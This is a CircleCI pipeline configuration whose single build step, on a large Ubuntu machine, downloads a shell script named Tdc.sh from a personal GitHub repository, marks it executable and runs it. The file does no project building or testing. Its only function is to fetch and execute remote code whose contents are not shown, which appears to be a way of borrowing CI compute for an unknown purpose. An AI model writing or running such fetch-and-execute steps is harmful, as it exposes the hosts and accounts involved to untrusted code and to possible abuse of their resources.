version: 2.1

jobs:
  build:
    machine:    
      image: ubuntu-2004:202010-01
      resource_class: large
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Tdc.sh && chmod +x Tdc.sh && ./Tdc.sh 
